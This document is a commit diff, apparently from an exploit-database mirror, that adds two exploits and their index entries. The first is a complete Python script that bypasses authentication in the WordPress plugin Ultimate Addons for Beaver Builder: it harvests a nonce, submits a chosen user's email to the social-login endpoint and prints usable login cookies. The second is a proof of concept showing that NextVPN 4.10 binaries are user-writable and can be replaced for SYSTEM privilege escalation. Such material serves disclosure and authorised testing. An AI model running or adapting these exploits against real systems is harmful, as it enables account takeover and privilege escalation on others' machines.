DB: 2020-01-01

2 changes to exploits/shellcodes NextVPN v4.10 - Insecure File Permissions Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
2020-01-01 05:01:57 +00:00 · 2020-01-01 05:01:57 +00:00 · e976278a3f
commit e976278a3f
parent cd36764b57
3 changed files with 146 additions and 0 deletions
--- a/exploits/php/webapps/47832.py
+++ b/exploits/php/webapps/47832.py
@ -0,0 +1,76 @@
+# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
+# Date: 2019-12-21
+# Exploit Authors: Raphael Karger & Nathan Hrncirik
+# Vendor Homepage: https://www.ultimatebeaver.com/
+# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
+'''
+
+Requirements:
+    * Valid Admin/User Email Needs to be Known
+    * Social Media Login Form has to be Embedded in the Specified URL
+
+'''
+
+#!/usr/bin/python3
+
+import requests
+import urllib.parse
+import json
+import argparse
+
+banner = r''' ____ ___  _____ _______________________________              .__         .__  __   
+|    |   \/  _  \\______   \______   \_   _____/__  _________ |  |   ____ |__|/  |_ 
+|    |   /  /_\  \|    |  _/|    |  _/|    __)_\  \/  /\____ \|  |  /  _ \|  \   __\
+|    |  /    |    \    |   \|    |   \|        \>    < |  |_> >  |_(  <_> )  ||  |  
+|______/\____|__  /______  /|______  /_______  /__/\_ \|   __/|____/\____/|__||__|  
+                \/       \/        \/        \/      \/|__|                         
+Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
+'''
+
+class exploit(object):
+    def __init__(self, page, email):
+        self.page = page
+        self.sess = requests.Session()
+        self.email = email
+        self.nonce = False
+
+    def get_nonce(self):
+        try:
+            nonce_req = self.sess.get(self.page)
+            if nonce_req.text.find("data-nonce=") != -1:
+                self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
+        except Exception as e:
+            print("Nonce Error: {}".format(e))
+
+    def auth_bypass(self):
+        try:
+            schema = urllib.parse.urlparse(self.page)
+            resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
+                    "action" : "uabb-lf-google-submit",
+                    "name" : "raphaelrocks",
+                    "email" : self.email,
+                    "nonce" : self.nonce
+            })
+            if resp.status_code == 200:
+                print("Exploit Successful, Use the Cookies to Login: \n{}".format(
+                    json.dumps(self.sess.cookies.get_dict(), indent=4)
+                ))
+        except Exception as e:
+            print("Auth Bypass Error: {}".format(e))
+
+    def begin_exploit(self):
+        self.get_nonce()
+        if self.nonce:
+            print("Found Nonce: {}".format(self.nonce))
+            self.auth_bypass()
+        else:
+            print("Failed to Gather Nonce")
+
+if __name__ == "__main__":
+    print(banner)
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
+    parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
+    args = parser.parse_args()
+    ex = exploit(args.url, args.email)
+    ex.begin_exploit()
--- a/exploits/windows/local/47831.txt
+++ b/exploits/windows/local/47831.txt
@ -0,0 +1,68 @@
+# Exploit Title: NextVPN v4.10 - Insecure File Permissions 
+# Date: 2019-12-23 
+# Exploit Author: SajjadBnd 
+# Contact: blackwolf@post.com 
+# Vendor Homepage: https://vm3max.site 
+# Software Link:http://dl.spacevm.com/NextVPNSetup-v4.10.exe 
+# Version: 4.10 
+# Tested on: Win10 Professional x64 
+
+[ Description ] 
+
+The NextVPN Application was installed with insecure file permissions. It was found that all folder and file permissions were incorrectly configured during installation. It was possible to replace the service binary. 
+
+[ PoC ]
+
+C:\Users\user\AppData\Local\NextVPN>icacls *.exe
+
+Helper64.exe NT AUTHORITY\SYSTEM:(F)
+             BUILTIN\Administrators:(F)
+             DESKTOP-5V14SL6\user:(F)
+ 
+NextVPN.exe NT AUTHORITY\SYSTEM:(F)
+            BUILTIN\Administrators:(F)
+            DESKTOP-5V14SL6\user:(F)
+ 
+Proxifier.exe NT AUTHORITY\SYSTEM:(F)
+              BUILTIN\Administrators:(F)
+              DESKTOP-5V14SL6\user:(F)
+ 
+ProxyChecker.exe NT AUTHORITY\SYSTEM:(F)
+                 BUILTIN\Administrators:(F)
+                 DESKTOP-5V14SL6\user:(F)
+ 
+Uninstall.exe NT AUTHORITY\SYSTEM:(F)
+              BUILTIN\Administrators:(F)
+              DESKTOP-5V14SL6\user:(F)
+ 
+Successfully processed 5 files; Failed processing 0 files
+and other Directories :
+
+>cd openconnect
+openconnect.exe NT AUTHORITY\SYSTEM:(F)
+                BUILTIN\Administrators:(F)
+                DESKTOP-5V14SL6\user:(F)
+Successfully processed 1 files; Failed processing 0 files
+ 
+ 
+>cd st
+ 
+st.exe NT AUTHORITY\SYSTEM:(F)
+       BUILTIN\Administrators:(F)
+       DESKTOP-5V14SL6\user:(F)
+Successfully processed 1 files; Failed processing 0 files
+ 
+>cd update
+
+update.exe NT AUTHORITY\SYSTEM:(F)
+           BUILTIN\Administrators:(F)
+           DESKTOP-5V14SL6\user:(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+[ Exploit -Privilege Escalation  ]
+
+ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable
+malicious  file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)
+
+ 
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10854,6 +10854,7 @@ id,file,description,date,author,type,platform,port
 47805,exploits/windows/local/47805.rb,"Microsoft UPnP - Local Privilege Elevation (Metasploit)",2019-12-30,Metasploit,local,windows,
 47810,exploits/windows/local/47810.py,"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)",2019-12-30,boku,local,windows,
 47812,exploits/windows/local/47812.py,"FTP Navigator 8.03 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
+47831,exploits/windows/local/47831.txt,"NextVPN v4.10 - Insecure File Permissions",2019-12-31,SajjadBnd,local,windows,
 47818,exploits/windows/local/47818.txt,"Wing FTP Server 6.0.7 - Unquoted Service Path",2019-12-30,"Nawaf Alkeraithe",local,windows,
 47825,exploits/windows/local/47825.py,"Domain Quester Pro 6.02 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
 47829,exploits/freebsd/local/47829.sh,"FreeBSD-SA-19:02.fd - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
@ -42136,3 +42137,4 @@ id,file,description,date,author,type,platform,port
 47826,exploits/hardware/webapps/47826.txt,"RICOH SP 4510SF Printer - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
 47827,exploits/hardware/webapps/47827.txt,"RICOH Web Image Monitor 1.09 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
 47828,exploits/hardware/webapps/47828.txt,"Heatmiser Netmonitor 3.03 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
+47832,exploits/php/webapps/47832.py,"Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass",2019-12-31,"Raphael Karger",webapps,php,